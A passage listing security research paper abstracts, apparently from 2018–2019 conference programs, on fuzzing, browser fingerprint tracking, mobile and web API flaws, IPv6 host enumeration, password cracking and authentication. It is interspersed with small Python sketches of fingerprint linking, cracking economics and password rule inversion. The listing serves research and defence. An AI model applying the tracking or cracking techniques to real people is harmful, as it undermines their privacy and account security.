In this paper, we propose a coverage sensitive fuzzing solution CollAFL. It mitigates path collisions by providing more accurate coverage information, while still preserving low instrumentation overhead. It also utilizes the coverage information to apply three new fuzzing strategies, speeding up the discovery of new paths and vulnerabilities. We implemented a prototype of CollAFL based on the popular fuzzer AFL and evaluated it on 24 popular applications. The results showed that path collisions are common, i.e., up to 75% of edges could collide with others in some applications, and CollAFL could reduce the edge collision ratio to nearly zero. Moreover, armed with the three fuzzing strategies, CollAFL outperforms AFL in terms of both code coverage and vulnerability discovery. On average, CollAFL covered 20% more program paths, found 320% more unique crashes and 260% more bugs than AFL in 200 hours. In total, CollAFL found 157 new security bugs with 95 new CVEs assigned.
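The collision problem is easy to reproduce with AFL's own edge-hashing scheme: every basic block gets a random ID at instrumentation time, and edge (prev, cur) is recorded at bitmap slot cur ^ (prev >> 1). The sketch below estimates how often distinct edges share a slot; block IDs are drawn at random, as AFL does, and all counts are illustrative:

```python
import random

MAP_SIZE = 2 ** 16           # AFL's default 64 KB bitmap

def afl_edge_index(prev_loc, cur_loc):
    # AFL instrumentation: slot = cur ^ (prev >> 1), within the bitmap
    return (cur_loc ^ (prev_loc >> 1)) % MAP_SIZE

random.seed(1)
blocks = [random.randrange(MAP_SIZE) for _ in range(200)]
edges = {(a, b) for a in blocks for b in blocks}   # a dense toy CFG
slots, collisions = {}, 0
for (a, b) in edges:
    idx = afl_edge_index(a, b)
    if idx in slots and slots[idx] != (a, b):
        collisions += 1                             # two edges, one slot
    slots[idx] = (a, b)
print(f"{collisions} of {len(edges)} edges collide in the bitmap")
```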

T-Fuzz: Fuzzing by Program Transformation

Fuzzing is a simple yet effective approach to discover software bugs utilizing randomly generated inputs. However, it is limited by coverage and cannot find bugs hidden in deep execution paths of the program because the randomly generated inputs fail complex sanity checks, e.g., checks on magic values, checksums, or hashes. To improve coverage, existing approaches rely on imprecise heuristics or complex input mutation techniques (e.g., symbolic execution or taint analysis) to bypass sanity checks. Our novel method tackles coverage from a different angle: by removing sanity checks in the target program. T-Fuzz leverages a coverage-guided fuzzer to generate inputs. Whenever the fuzzer can no longer trigger new code paths, a light-weight, dynamic tracing based technique detects the input checks that the fuzzer-generated inputs fail. These checks are then removed from the target program. Fuzzing then continues on the transformed program, allowing the code protected by the removed checks to be triggered and potential bugs discovered. Fuzzing transformed programs to find bugs poses two challenges: (1) removal of checks leads to over-approximation and false positives, and (2) even for true bugs, the crashing input on the transformed program may not trigger the bug in the original program. As an auxiliary post-processing step, T-Fuzz leverages a symbolic execution-based approach to filter out false positives and reproduce true bugs in the original program. By transforming the program as well as mutating the input, T-Fuzz covers more code and finds more true bugs than any existing technique. We have evaluated T-Fuzz on the DARPA Cyber Grand Challenge dataset, LAVA-M dataset and 4 real-world programs (pngfix, tiffinfo, magick and pdftohtml). For the CGC dataset, T-Fuzz finds bugs in 166 binaries, Driller in 121, and AFL in 105. In addition, T-Fuzz found 3 new bugs in previously-fuzzed programs and libraries.

Angora: Efficient Fuzzing by Principled Search

Fuzzing is a popular technique for finding software bugs. However, the performance of the state-of-the-art fuzzers leaves a lot to be desired. Fuzzers based on symbolic execution produce quality inputs but run slow, while fuzzers based on random mutation run fast but have difficulty producing quality inputs. We propose Angora, a new mutation-based fuzzer that outperforms the state-of-the-art fuzzers by a wide margin. The main goal of Angora is to increase branch coverage by solving path constraints without symbolic execution. To solve path constraints efficiently, we introduce several key techniques: scalable byte-level taint tracking, context-sensitive branch count, search based on gradient descent, and input length exploration. On the LAVA-M data set, Angora found almost all the injected bugs, found more bugs than any other fuzzer that we compared with, and found eight times as many bugs as the second-best fuzzer in the program “who”. Angora also found 103 bugs that the LAVA authors injected but could not trigger. We also tested Angora on eight popular, mature open source programs. Angora found 6, 52, 29, 40 and 48 new bugs in file, jhead, nm, objdump and size, respectively. We measured the coverage of Angora and evaluated how its key techniques contribute to its impressive performance.
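The "search instead of solve" idea can be sketched in a few lines: instrument a branch so it reports a numeric distance to being taken, then run a local search over the input bytes that influence it. The predicate and the coordinate-descent loop below are toys; Angora's real search uses byte-level taint to pick the bytes and a proper gradient over them:

```python
def branch_distance(data):
    """Stand-in for an instrumented branch `if data[:4] == b"FUZZ"`:
    returns 0 exactly when the branch would be taken."""
    return sum(abs(a - b) for a, b in zip(data[:4], b"FUZZ"))

def descend(data, dist, sweeps=300):
    """Coordinate descent: nudge each byte up or down if that lowers
    the branch distance, until the branch flips."""
    data = bytearray(data)
    for _ in range(sweeps):
        if dist(data) == 0:
            return bytes(data)
        for i in range(len(data)):
            cands = [c for c in (data[i] - 1, data[i], data[i] + 1)
                     if 0 <= c <= 255]
            def score(c):
                data[i] = c
                return dist(data)
            data[i] = min(cands, key=score)   # move this byte downhill
    return bytes(data)

print(descend(b"AAAAAAAA", branch_distance))  # b'FUZZAAAA'
```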

Web

FP-STALKER: Tracking Browser Fingerprint Evolutions Along Time

Browser fingerprinting has emerged as a technique to track users without their consent. Unlike cookies, fingerprinting is a stateless technique that does not store any information on devices, but instead exploits unique combinations of attributes handed over freely by browsers. The uniqueness of fingerprints allows them to be used for identification. However, browser fingerprints change over time and the effectiveness of tracking users over longer durations has not been properly addressed.

In this paper, we show that browser fingerprints tend to change frequently - from every few hours to days - due to, for example, software updates or configuration changes. Yet, despite these frequent changes, we show that browser fingerprints can still be linked, thus enabling long-term tracking.

FP-STALKER is an approach to link browser fingerprint evolutions. It compares fingerprints to determine if they originate from the same browser. We created two variants of FP-STALKER, a rule-based variant that is faster, and a hybrid variant that exploits machine learning to boost accuracy. To evaluate FP-STALKER, we conduct an empirical study using 98,598 fingerprints we collected from 1,905 distinct browser instances. We compare our algorithm with the state of the art and show that, on average, we can track browsers for 54.48 days, and 26% of browsers can be tracked for more than 100 days.
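The rule-based variant can be pictured as a two-tier matcher: attributes that should never change for a given browser must match exactly, while a bounded number of the remaining attributes may evolve between observations. The rule set and threshold below are invented for illustration, not FP-STALKER's actual rules:

```python
NEVER_CHANGE = {"os", "platform", "browser_family"}   # illustrative set
MAX_EVOLVED_ATTRS = 2

def same_browser(fp_a: dict, fp_b: dict) -> bool:
    """Link two fingerprints if stable attributes match exactly and
    only a few of the remaining ones have evolved."""
    if any(fp_a.get(k) != fp_b.get(k) for k in NEVER_CHANGE):
        return False
    mutable = (set(fp_a) | set(fp_b)) - NEVER_CHANGE
    changed = sum(fp_a.get(k) != fp_b.get(k) for k in mutable)
    return changed <= MAX_EVOLVED_ATTRS

old = {"os": "Linux", "platform": "x86_64", "browser_family": "Firefox",
       "user_agent": "Firefox/60", "fonts": "f1", "canvas": "c1"}
new = dict(old, user_agent="Firefox/61", canvas="c2")   # after an update
print(same_browser(old, new))   # True: linked despite two changed attrs
```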

Study and Mitigation of Origin Stripping Vulnerabilities in Hybrid-postMessage Enabled Mobile Applications

postMessage is popular in HTML5 based web apps to allow the communication between different origins. With the increasing popularity of the embedded browser (i.e., WebView) in mobile apps (i.e., hybrid apps), postMessage has found utility in these apps. However, different from web apps, hybrid apps have a unique requirement that their native code (e.g., Java for Android) also needs to exchange messages with web code loaded in WebView. To bridge the gap, developers typically extend postMessage by treating the native context as a new frame, and allowing the communication between the new frame and the web frames. We term such extended postMessage “hybrid postMessage” in this paper. We find that hybrid postMessage introduces new critical security flaws: all origin information of a message is not respected or even lost during the message delivery in hybrid postMessage. If adversaries inject malicious code into WebView, the malicious code may leverage the flaws to passively monitor messages that may contain sensitive information, or actively send messages to arbitrary message receivers and access their internal functionalities and data. We term the novel security issue caused by hybrid postMessage “Origin Stripping Vulnerability” (OSV).

In this paper, our contributions are fourfold. First, we conduct the first systematic study on OSV. Second, we propose a lightweight detection tool against OSV, called OSV-Hunter. Third, we evaluate OSV-Hunter using a set of popular apps. We found that 74 apps implemented hybrid postMessage, and all these apps suffered from OSV, which might be exploited by adversaries to perform remote real-time microphone monitoring, data race, internal data manipulation, denial of service (DoS) attacks and so on. Several popular development frameworks, libraries (such as the Facebook React Native framework, and the Google cloud print library) and apps (such as Adobe Reader and WPS office) are impacted. Lastly, to mitigate OSV from the root, we design and implement three new postMessage APIs, called OSV-Free. Our evaluation shows that OSV-Free is secure and fast, and it is generic and resilient to the notorious Android fragmentation problem. We also demonstrate that OSV-Free is easy to use, by applying OSV-Free to harden the complex “Facebook React Native” framework. OSV-Free is open source, and its source code and more implementation and evaluation details are available online.

Mobile Application Web API Reconnaissance: Web-to-Mobile Inconsistencies & Vulnerabilities

Modern mobile apps use cloud-hosted HTTP-based API services and heavily rely on the Internet infrastructure for data communication and storage. To improve performance and leverage the power of the mobile device, input validation and other business logic required for interfacing with web API services are typically implemented on the mobile client. However, when a web service implementation fails to thoroughly replicate input validation, it gives rise to inconsistencies that could lead to attacks that can compromise user security and privacy. Developing automatic methods of auditing web APIs for security remains challenging.

In this paper, we present a novel approach for automatically analyzing mobile app-to-web API communication to detect inconsistencies in input validation logic between apps and their respective web API services. We present our system, WARDroid, which implements a static analysis-based web API reconnaissance approach to uncover inconsistencies on real world API services that can lead to attacks with severe consequences for potentially millions of users throughout the world. Our system utilizes program analysis techniques to automatically extract HTTP communication templates from Android apps that encode the input validation constraints imposed by the apps on outgoing web requests to web API services. WARDroid is also enhanced with blackbox testing of server validation logic to identify inconsistencies that can lead to attacks.

We evaluated our system on a set of 10,000 popular free apps from the Google Play Store. We detected problematic logic in APIs used in over 4,000 apps, including 1,743 apps that use unencrypted HTTP communication. We further tested 1,000 apps to validate web API hijacking vulnerabilities that can lead to potential compromise of user privacy and security and found that millions of users are potentially affected from our sample set of tested apps.

Enumerating Active IPv6 Hosts for Large-scale Security Scans via DNSSEC-signed Reverse Zones

Security research has made extensive use of exhaustive Internet-wide scans over the recent years, as they can provide significant insights into the overall state of security of the Internet, and ZMap made scanning the entire IPv4 address space practical. However, the IPv4 address space is exhausted, and a switch to IPv6, the only accepted long-term solution, is inevitable. In turn, to better understand the security of devices connected to the Internet, including in particular Internet of Things devices, it is imperative to include IPv6 addresses in security evaluations and scans. Unfortunately, it is practically infeasible to iterate through the entire IPv6 address space, as it is 2^96 times larger than the IPv4 address space. Therefore, enumeration of active hosts prior to scanning is necessary. Without it, we will be unable to investigate the overall security of Internet-connected devices in the future.

In this paper, we introduce a novel technique to enumerate an active part of the IPv6 address space by walking DNSSEC-signed IPv6 reverse zones. Subsequently, by scanning the enumerated addresses, we uncover significant security problems: the exposure of sensitive data, and incorrectly controlled access to hosts, such as access to routing infrastructure via administrative interfaces, all of which were accessible via IPv6. Furthermore, from our analysis of the differences between accessing dual-stack hosts via IPv6 and IPv4, we hypothesize that the root cause is that machines automatically and by default take on globally routable IPv6 addresses. This is a practice that the affected system administrators appear unaware of, as the respective services are almost always properly protected from unauthorized access via IPv4.

Our findings indicate (i) that enumerating active IPv6 hosts is practical without a preferential network position contrary to common belief, (ii) that the security of active IPv6 hosts is currently still lagging behind the security state of IPv4 hosts, and (iii) that unintended IPv6 connectivity is a major security issue for unaware system administrators.
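The technique hinges on how reverse DNS names IPv6 hosts: one label per nibble, reversed, under ip6.arpa. Because DNSSEC's NSEC records authenticate the gap between two consecutive existing names, a signed reverse zone can be walked name-by-name instead of guessed. A sketch of the naming only (the walking itself requires live DNS queries and is omitted):

```python
import ipaddress

def reverse_name(addr: str) -> str:
    """The ip6.arpa name for an address: one label per nibble, reversed.
    NSEC records in a signed reverse zone point from each existing name
    to the next, letting a scanner enumerate hosts in order."""
    nibbles = ipaddress.IPv6Address(addr).exploded.replace(":", "")
    return ".".join(reversed(nibbles)) + ".ip6.arpa"

print(reverse_name("2001:db8::1"))
# 1.0.0.0. ... .8.b.d.0.1.0.0.2.ip6.arpa (32 nibble labels)
```

The standard library exposes the same mapping directly as ipaddress.IPv6Address(addr).reverse_pointer.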

Tracking Certificate Misissuance in the Wild

Certificate Authorities (CAs) regularly make mechanical errors when issuing certificates. To quantify these errors, we introduce ZLint, a certificate linter that codifies the policies set forth by the CA/Browser Forum Baseline Requirements and RFC 5280 that can be tested in isolation. We run ZLint on browser-trusted certificates in Censys and systematically analyze how well CAs construct certificates. We find that the number of errors has dropped drastically since 2012. In 2017, only 0.02% of certificates have errors. However, this is largely due to a handful of large authorities that consistently issue correct certificates. There remains a long tail of small authorities that regularly issue non-conformant certificates. We further find that issuing certificates with errors is correlated with other types of mismanagement and, for large authorities, with browser action. Drawing on our analysis, we conclude with a discussion of how the community can best use lint data to identify authorities with worrisome organizational practices and ensure the long-term health of the Web PKI.
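Each lint codifies one mechanically checkable rule from the Baseline Requirements or RFC 5280. As a flavor of what a single lint boils down to, here is a sketch of a validity-period check in the spirit of the BR cap of 825 days for subscriber certificates issued after March 2018 (ZLint's real lints parse and check full certificates):

```python
from datetime import datetime, timedelta

def lint_validity_period(not_before: datetime, not_after: datetime) -> bool:
    """Pass iff the certificate's validity period is at most 825 days,
    the Baseline Requirements cap for certificates issued after 2018-03-01."""
    return not_after - not_before <= timedelta(days=825)

print(lint_validity_period(datetime(2018, 4, 1), datetime(2021, 4, 1)))
# False: roughly 1096 days exceeds the cap
```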

A Formal Treatment of Accountable Proxying over TLS

Much of Internet traffic nowadays passes through active proxies, whose role is to inspect, filter, cache, or transform data exchanged between two endpoints. To perform their tasks, such proxies modify channel-securing protocols, like TLS, resulting in serious vulnerabilities. Such problems are exacerbated by the fact that middleboxes are often invisible to one or both endpoints, leading to a lack of accountability. A recent protocol, called mcTLS, pioneered accountability for proxies, which are authorized by the endpoints and given limited read/write permissions to application traffic.

Unfortunately, we show that mcTLS is insecure: the protocol modifies the TLS protocol, exposing it to a new class of middlebox-confusion attacks. Such attacks went unnoticed mainly because mcTLS lacked a formal analysis and security proofs. Hence, our second contribution is to formalize the goal of accountable proxying over secure channels. Third, we propose a provably-secure alternative to soon-to-be-standardized mcTLS: a generic and modular protocol design that carefully composes generic secure channel-establishment protocols, which we prove secure. Finally, we present a proof-of-concept implementation of our design, instantiated with unmodified TLS 1.3, and evaluate its overheads.

Authentication

Secure Device Bootstrapping without Secrets Resistant to Signal Manipulation Attacks

In this paper, we address the fundamental problem of securely bootstrapping a group of wireless devices to a hub, when none of the devices share prior associations (secrets) with the hub or between them. This scenario aligns with the secure deployment of body area networks, IoT, medical devices, industrial automation sensors, autonomous vehicles, and others. We develop VERSE, a physical-layer group message integrity verification primitive that effectively detects advanced wireless signal manipulations that can be used to launch man-in-the-middle (MitM) attacks over wireless. Without using shared secrets to establish authenticated channels, such attacks are notoriously difficult to thwart and can undermine the authentication and key establishment processes. VERSE exploits the existence of multiple devices to verify the integrity of the messages exchanged within the group. We then use VERSE to build a bootstrapping protocol, which securely introduces new devices to the network. Compared to the state-of-the-art, VERSE achieves in-band message integrity verification during secure pairing using only the RF modality without relying on out-of-band channels or extensive human involvement. It guarantees security even when the adversary is capable of fully controlling the wireless channel by annihilating and injecting wireless signals. We study the limits of such advanced wireless attacks and prove that the introduction of multiple legitimate devices can be leveraged to increase the security of the pairing process. We validate our claims via theoretical analysis and extensive experimentations on the USRP platform. We further discuss various implementation aspects such as the effect of time synchronization between devices and the effects of multipath and interference. Note that the elimination of shared secrets, default passwords, and public key infrastructures effectively addresses the related key management challenges when these are considered at scale.

Do You Feel What I Hear? Enabling Autonomous IoT Device Pairing using Different Sensor Types

Context-based pairing solutions increase the usability of IoT device pairing by eliminating any human involvement in the pairing process. This is possible by utilizing on-board sensors (with the same sensing modalities) to capture a common physical context (e.g., ambient sound via each device’s microphone). However, in a smart home scenario, it is impractical to assume that all devices will share a common sensing modality. For example, a motion detector is only equipped with an infrared sensor while Amazon Echo only has microphones. In this paper, we develop a new context-based pairing mechanism called Perceptio that uses time as the common factor across differing sensor types. By focusing on the event timing, rather than the specific event sensor data, Perceptio creates event fingerprints that can be matched across a variety of IoT devices. We propose Perceptio based on the idea that devices co-located within a physically secure boundary (e.g., single family house) can observe more events in common over time, as opposed to devices outside. Devices make use of the observed contextual information to provide entropy for Perceptio’s pairing protocol. We design and implement Perceptio, and evaluate its effectiveness as an autonomous secure pairing solution. Our implementation demonstrates the ability to sufficiently distinguish between legitimate devices (placed within the boundary) and attacker devices (placed outside) by imposing a threshold on fingerprint similarity. Perceptio demonstrates an average fingerprint similarity of 94.9% between legitimate devices while even a hypothetical impossibly well-performing attacker yields only 68.9% between itself and a valid device.
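The key move is to fingerprint when things happen rather than what each sensor measures, so devices with disjoint modalities can still compare notes. A minimal sketch of timing-based fingerprints and their similarity; the binning, the Jaccard score, and the timestamps are all illustrative, and Perceptio's actual protocol additionally derives pairing-key entropy from the shared events:

```python
def fingerprint(event_times, bin_seconds=1.0):
    """Reduce a sensor's event timestamps to the set of time bins in
    which it observed something -- comparable across sensor types."""
    return {int(t // bin_seconds) for t in event_times}

def similarity(fp_a, fp_b):
    return len(fp_a & fp_b) / len(fp_a | fp_b)   # Jaccard index

motion = fingerprint([3.1, 17.4, 41.9, 63.2])    # infrared motion sensor
mic    = fingerprint([3.3, 17.2, 41.8, 80.5])    # microphone, same room
print(similarity(motion, mic))                   # 0.6: mostly shared events
```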

On the Economics of Offline Password Cracking

We develop an economic model of an offline password cracker which allows us to make quantitative predictions about the fraction of accounts that a rational password attacker would crack in the event of an authentication server breach. We apply our economic model to analyze recent massive password breaches at Yahoo!, Dropbox, LastPass and AshleyMadison. All four organizations were using key-stretching to protect user passwords. In fact, LastPass’ use of PBKDF2-SHA256 with 10^5 hash iterations exceeds the 2017 NIST minimum recommendation by an order of magnitude. Nevertheless, our analysis paints a bleak picture: the adopted key-stretching levels provide insufficient protection for user passwords. In particular, we present strong evidence that most user passwords follow a Zipf’s law distribution, and characterize the behavior of a rational attacker when user passwords are selected from a Zipf’s law distribution. We show that there is a finite threshold which depends on the Zipf’s law parameters that characterizes the behavior of a rational attacker — if the value of a cracked password (normalized by the cost of computing the password hash function) exceeds this threshold then the adversary’s optimal strategy is always to continue attacking until each user password has been cracked. In all cases (Yahoo!, Dropbox, LastPass and AshleyMadison) we find that the value of a cracked password almost certainly exceeds this threshold meaning that a rational attacker would crack all passwords that are selected from the Zipf’s law distribution (i.e., most user passwords). This prediction holds even if we incorporate an aggressive model of diminishing returns for the attacker (e.g., the total value of 500 million cracked passwords is less than 100 times the total value of 5 million passwords). On a positive note our analysis demonstrates that memory hard functions (MHFs) such as SCRYPT or Argon2i can significantly reduce the damage of an offline attack. In particular, we find that because MHFs substantially increase guessing costs a rational attacker will give up well before he cracks most user passwords and this prediction holds even if the attacker does not encounter diminishing returns for additional cracked passwords. Based on our analysis we advocate that password hashing standards should be updated to require the use of memory hard functions for password hashing and disallow the use of non-memory hard functions such as BCRYPT or PBKDF2.
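The threshold argument can be made concrete in a few lines: a rational attacker guesses passwords in decreasing-probability order and stops as soon as the expected marginal value of the next guess drops below the per-guess hashing cost. The sketch below uses invented parameters; the paper fits Zipf parameters to breach data and normalizes password value by hash cost:

```python
def rational_cracking(v, k, n=10**6, s=0.78):
    """Under a Zipf distribution p_i ~ i^(-s) over n candidate passwords,
    return (fraction of the list searched, probability mass cracked) for
    an attacker who values each cracked password at v and pays k per
    guess. All parameters here are purely illustrative."""
    Z = sum(i ** -s for i in range(1, n + 1))
    mass = 0.0
    for i in range(1, n + 1):
        p = (i ** -s) / Z
        if v * p < k:               # marginal value < marginal cost: stop
            return (i - 1) / n, mass
        mass += p
    return 1.0, mass                # above threshold for every password

print(rational_cracking(v=25.0, k=1e-7))  # cheap hash: cracks everything
print(rational_cracking(v=25.0, k=1e-3))  # costly hashing: stops early
```

Raising k by several orders of magnitude (the effect of a memory-hard function) is what moves the attacker from the first regime into the second.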

A Tale of Two Studies: The Best and Worst of YubiKey Usability

Two-factor authentication (2FA) significantly improves the security of password-based authentication. Recently, there has been increased interest in Universal 2nd Factor (U2F) security keys – small hardware devices that require users to press a button on the security key to authenticate. To examine the usability of security keys in non-enterprise usage, we conducted two user studies of the YubiKey, a popular line of U2F security keys. The first study tasked 31 participants with configuring a Windows, Google, and Facebook account to authenticate using a YubiKey. This study revealed problems with setup instructions and workflow including users locking themselves out of their operating system or thinking they had successfully enabled 2FA when they had not. In contrast, the second study had 25 participants use a YubiKey in their daily lives over a period of four weeks, revealing that participants generally enjoyed the experience. Conducting both a laboratory and longitudinal study yielded insights into the usability of security keys that would not have been evident from either study in isolation. Based on our analysis, we recommend standardizing the setup process, enabling verification of success, allowing shared accounts, integrating with operating systems, and preventing lockouts.

When Your Fitness Tracker Betrays You: Quantifying the Predictability of Biometric Features Across Contexts

Attacks on behavioral biometrics have become increasingly popular. Most research has been focused on presenting a previously obtained feature vector to the biometric sensor, often by the attacker training themselves to change their behavior to match that of the victim. However, obtaining the victim’s biometric information may not be easy, especially when the user’s template on the authentication device is adequately secured. As such, if the authentication device is inaccessible, the attacker may have to obtain data elsewhere. In this paper, we present an analytic framework that enables us to measure how easily features can be predicted based on data gathered in a different context (e.g., different sensor, performed task or environment). This framework is used to assess how resilient individual features or entire biometrics are against such cross-context attacks. In order to be able to compare existing biometrics with regard to this property, we perform a user study to gather biometric data from 30 participants and five biometrics (ECG, eye movements, mouse movements, touchscreen dynamics and gait) in a variety of contexts. We make this dataset publicly available online. Our results show that many attack scenarios are viable in practice as features are easily predicted from a variety of contexts. All biometrics include features that are particularly predictable (e.g., amplitude features for ECG or curvature for mouse movements). Overall, we observe that cross-context attacks on eye movements, mouse movements and touchscreen inputs are comparatively easy while ECG and gait exhibit much more chaotic cross-context changes.
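
One way to picture "predictability across contexts" (a simplified stand-in for the paper's framework, with synthetic data): fit a per-feature regression from context A to context B and treat the held-out error as the feature's resilience score. Everything below is illustrative.

```python
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_absolute_error
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)
# Synthetic biometric feature measured in two contexts: context B is a
# noisy affine transform of context A (easy to predict => weak feature).
ctx_a = rng.normal(size=(200, 1))
ctx_b = 0.9 * ctx_a[:, 0] + 0.1 + rng.normal(scale=0.05, size=200)

a_tr, a_te, b_tr, b_te = train_test_split(ctx_a, ctx_b, random_state=0)
model = LinearRegression().fit(a_tr, b_tr)
err = mean_absolute_error(b_te, model.predict(a_te))
print(f"cross-context MAE: {err:.3f}  (low error = easily predicted feature)")
```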

2019 program dblp

Session 3: Web Security

Does Certificate Transparency Break the Web? Measuring Adoption and Error Rate

Certificate Transparency (CT) is an emerging system for enabling the rapid discovery of malicious or misissued certificates. Initially standardized in 2013, CT is now finally beginning to see widespread support. Although CT provides desirable security benefits, web browsers cannot begin requiring all websites to support CT at once, due to the risk of breaking large numbers of websites. We discuss challenges for deployment, analyze the adoption of CT on the web, and measure the error rates experienced by users of the Google Chrome web browser. We find that CT has so far been widely adopted with minimal breakage and warnings.

Security researchers often struggle with the tradeoff between security and user frustration: rolling out new security requirements often causes breakage. We view CT as a case study for deploying ecosystem-wide change while trying to minimize end user impact. We discuss the design properties of CT that made its success possible, as well as draw lessons from its risks and pitfalls that could be avoided in future large-scale security deployments.

EmPoWeb: Empowering Web Applications with Browser Extensions

Browser extensions are third party programs, tightly integrated into browsers, where they execute with elevated privileges in order to provide users with additional functionalities. Unlike web applications, extensions are not subject to the Same Origin Policy (SOP) and therefore can read and write user data on any web application. They also have access to sensitive user information including browsing history, bookmarks, credentials (cookies) and list of installed extensions. They have access to a permanent storage in which they can store data as long as they are installed in the user’s browser. They can trigger the download of arbitrary files and save them on the user’s device.

For security reasons, browser extensions and web applications are executed in separate contexts. Nonetheless, in all major browsers, extensions and web applications can interact by exchanging messages. Through these communication channels, a web application can exploit extension privileged capabilities and thereby access and exfiltrate sensitive user information.

In this work, we analyzed the communication interfaces exposed to web applications by Chrome, Firefox and Opera browser extensions. As a result, we identified many extensions that web applications can exploit to access privileged capabilities. Through extensions’ APIs, web applications can bypass SOP and access user data on any other web application, access user credentials (cookies), browsing history, bookmarks, list of installed extensions, extensions storage, and download and save arbitrary files on the user’s device.

Our results demonstrate that the communications between browser extensions and web applications pose serious security and privacy threats to browsers, web applications and more importantly to users. We discuss countermeasures and proposals, and believe that our study and in particular the tool we used to detect and exploit these threats, can be used as part of extensions review process by browser vendors to help them identify and fix the aforementioned problems in extensions.
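
To get a feel for the analysis, here is a crude static scan (my sketch, nothing like the authors' actual tool) that flags unpacked extensions whose scripts register externally reachable message listeners. The chrome.* listener names are real extension APIs; the directory path is a hypothetical placeholder.

```python
import os
import re

# Chrome APIs through which web pages can message an extension directly,
# plus the generic runtime listener reachable via content scripts.
SUSPICIOUS = re.compile(r"onMessageExternal|onConnectExternal|runtime\.onMessage")

def scan_extension(root):
    """Yield (file, line_no, line) for scripts exposing message listeners."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="ignore") as f:
                for no, line in enumerate(f, 1):
                    if SUSPICIOUS.search(line):
                        yield path, no, line.strip()

for hit in scan_extension("/path/to/unpacked/extension"):  # hypothetical path
    print(hit)
```

A flagged listener is only a starting point; whether it actually leaks privileged data depends on what the handler does with the message.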

“If HTTPS Were Secure, I Wouldn’t Need 2FA” - End User and Administrator Mental Models of HTTPS

HTTPS is one of the most important protocols used to secure communication and is, fortunately, becoming more pervasive. However, the long tail of websites in particular is still not sufficiently secured.
HTTPS involves different types of users, e.g., end users who are forced to make critical security decisions when faced with warnings, or administrators who are required to deal with cryptographic fundamentals and complex decisions concerning compatibility.

In this work, we present the first qualitative study of both end user and administrator mental models of HTTPS. We interviewed 18 end users and 12 administrators; our findings reveal misconceptions about security benefits and threat models from both groups. We identify protocol components that interfere with secure configurations and usage behavior and reveal differences between administrator and end user mental models.

Our results suggest that end user mental models are more conceptual while administrator models are more protocol-based. We also found that end users often confuse encryption with authentication, significantly underestimate the security benefits of HTTPS, and ignore and distrust security indicators while administrators often do not understand the interplay of functional protocol components. Based on the different mental models, we discuss implications and provide actionable recommendations for future designs of user interfaces and protocols.

Fidelius: Protecting User Secrets from Compromised Browsers

Users regularly enter sensitive data, such as passwords, credit card numbers, or tax information, into the browser window. While modern browsers provide powerful client-side privacy measures to protect this data, none of these defenses prevent a browser compromised by malware from stealing it. In this work, we present Fidelius, a new architecture that uses trusted hardware enclaves integrated into the browser to enable protection of user secrets during web browsing sessions, even if the entire underlying browser and OS are fully controlled by a malicious attacker.

Fidelius solves many challenges involved in providing protection for browsers in a fully malicious environment, offering support for integrity and privacy for form data, JavaScript execution, XMLHttpRequests, and protected web storage, while minimizing the TCB. Moreover, interactions between the enclave and the browser, the keyboard, and the display all require new protocols, each with their own security considerations. Finally, Fidelius takes into account UI considerations to ensure a consistent and simple interface for both developers and users.

As part of this project, we develop the first open source system that provides a trusted path from input and output peripherals to a hardware enclave with no reliance on additional hypervisor security assumptions. These components may be of independent interest and useful to future projects.

We implement and evaluate Fidelius to measure its performance overhead, finding that Fidelius imposes acceptable overhead on page load and user interaction for secured pages and has no impact on pages and page components that do not use its enhanced security features.

Postcards from the Post-HTTP World: Amplification of HTTPS Vulnerabilities in the Web Ecosystem

HTTPS aims at securing communication over the Web by providing a cryptographic protection layer that ensures the confidentiality and integrity of communication and enables client/server authentication. However, HTTPS is based on the SSL/TLS protocol suites that have been shown to be vulnerable to various attacks over the years. This has required fixes and mitigations both in the servers and in the browsers, producing a complicated mixture of protocol versions and implementations in the wild, which makes it unclear which attacks are still effective on the modern Web and what their impact is on web application security. In this paper, we present the first systematic quantitative evaluation of web application insecurity due to cryptographic vulnerabilities. We specify attack conditions against TLS using attack trees and we crawl the Alexa Top 10k to assess the impact of these issues on page integrity, authentication credentials and web tracking. Our results show that the security of a considerable number of websites is severely harmed by cryptographic weaknesses that, in many cases, are due to external or related-domain hosts. This empirically, yet systematically, demonstrates how a relatively limited number of exploitable HTTPS vulnerabilities are amplified by the complexity of the web ecosystem.

Session 6: Protocols and Authentication

Reasoning Analytically About Password-Cracking Software

A rich literature has presented efficient techniques for estimating password strength by modeling password-cracking algorithms. Unfortunately, these previous techniques only apply to probabilistic password models, which real attackers seldom use. In this paper, we introduce techniques to reason analytically and efficiently about transformation-based password cracking in software tools like John the Ripper and Hashcat. We define two new operations, rule inversion and guess counting, with which we analyze these tools without needing to enumerate guesses. We implement these techniques and find orders-of-magnitude reductions in the time it takes to estimate password strength. We also present four applications showing how our techniques enable increased scientific rigor in optimizing these attacks’ configurations. In particular, we show how our techniques can leverage revealed password data to improve orderings of transformation rules and to identify rules and words potentially missing from an attack configuration. Our work thus introduces some of the first principled mechanisms for reasoning scientifically about the types of password-guessing attacks that occur in practice.
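
The two operations are easy to illustrate on toy rules (a sketch under my own tiny rule set, far from Hashcat's or John the Ripper's full rule languages): each rule ships with an inverse that maps a target password back to the dictionary words that could have produced it, so a password's guess number can be computed without enumerating guesses.

```python
# Toy transformation rules as (apply, invert) pairs. invert(pw) returns the
# set of candidate dictionary words that the rule would map onto pw.
RULES = [
    (lambda w: w, lambda p: {p}),                                  # identity
    (lambda w: w.capitalize(),
     lambda p: {p.lower()} if p[:1].isupper() else set()),         # capitalize
    (lambda w: w + "1",
     lambda p: {p[:-1]} if p.endswith("1") else set()),            # append '1'
]

WORDLIST = ["password", "dragon", "letmein"]

def guess_number(target, wordlist=WORDLIST, rules=RULES):
    """Guess counting via rule inversion: the target's position in the
    rule-major guessing order, without generating every guess."""
    words = set(wordlist)
    for r, (_, invert) in enumerate(rules):
        preimages = invert(target) & words
        if preimages:
            word = min(preimages, key=wordlist.index)
            return r * len(wordlist) + wordlist.index(word)
    return None  # never guessed by this configuration

print(guess_number("Dragon"))    # rule 1 applied to 'dragon' -> guess 4
print(guess_number("letmein1"))  # rule 2 applied to 'letmein' -> guess 8
print(guess_number("zebra"))     # None: missing word or missing rule
```

The `None` case is exactly the paper's third application: revealed passwords that no (rule, word) pair explains point at rules or words missing from the attack configuration.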

True2F: Backdoor-Resistant Authentication Tokens

